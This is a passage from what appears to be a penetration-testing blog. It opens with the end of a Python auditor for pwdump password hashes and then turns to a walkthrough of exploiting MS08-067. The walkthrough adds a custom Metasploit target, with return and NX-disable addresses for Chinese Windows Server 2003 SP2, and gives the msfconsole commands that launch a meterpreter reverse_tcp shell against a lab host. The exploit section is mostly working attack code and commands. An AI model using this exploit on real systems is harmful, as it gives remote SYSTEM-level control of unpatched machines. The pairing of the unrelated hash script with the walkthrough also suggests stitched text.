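        findings.append("empty_password")
    return findings


def audit_pwdump(text: str) -> Dict[str, List[str]]:
    """Map each account name to its list of findings (empty list = nothing seen)."""
    return {rec["user"]: audit_account(rec) for rec in parse_pwdump(text)}


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_DUMP).items():
        print(f"{user:24} {', '.join(findings) or 'ok'}")
```

On the dump above this reports four accounts with LM hashes still stored (the host never had NoLMHash enabled) and the Guest account with an empty password; SUPPORT_388945a0 shows the empty-LM constant beside a real NT hash, which is what a disabled or over-long LM hash looks like.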

For the shared image of the target machine used here, please search on Baidu.

MS08_067

MS08_067 is a typical buffer overflow vulnerability. The Windows Server service has a buffer overflow when processing specially crafted RPC requests. A remote attacker can trigger this overflow by sending malicious RPC requests, resulting in a complete compromise of the system and execution of arbitrary commands with SYSTEM privileges. For Windows 2000, XP and Server 2003, this vulnerability can be exploited without authentication. For Windows Vista and Server 2008, authentication may be required.

  • Release Date: 2008/10/22
  • Ports: 139, 445
  • Description: Microsoft Security Bulletin KB958644
  • Vulnerability impact: a vulnerability in the Server service could allow remote code execution
  • Affected operating systems: Windows 2000, XP and Server 2003 (rated critical); Windows Vista, Server 2008 and 7 Beta (rated important)

There are also many tutorials on MS08_067 vulnerability attacks on the Internet.

However, the MS08_067 exploit shipped with Kali only has targets for the foreign-language (non-Chinese) Windows versions; there is no target for the Chinese version of Windows Server 2003 SP2. So today I will mainly show how to use it against the Chinese version of Server 2003 SP2.

First, change into this directory:

/usr/share/metasploit-framework/modules/exploits/windows/smb

Then open the file ms08_067_netapi.rb and add the following target entry:

[ 'Windows 2003 SP2 Chinese (NX)',
  {
    'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
    'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL (0x565DC3)
    'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL (0xFFE4)
    'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
    'Scratch'   => 0x00020408,
  }
],

Save and exit!

Then we can start our attack:

msfconsole #Enter the msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets #View the system versions supported as targets

We can now see Windows 2003 SP2 Chinese (NX) in the target list.

Then we set the target and the remaining options:

msf exploit(ms08_067_netapi) > set target 65
msf exploit(ms08_067_netapi) > set rhost 192.168.10.19
msf exploit(ms08_067_netapi) > set lhost 192.168.10.15
msf exploit(ms08_067_netapi) > exploit 

You can see that the attack was successful!
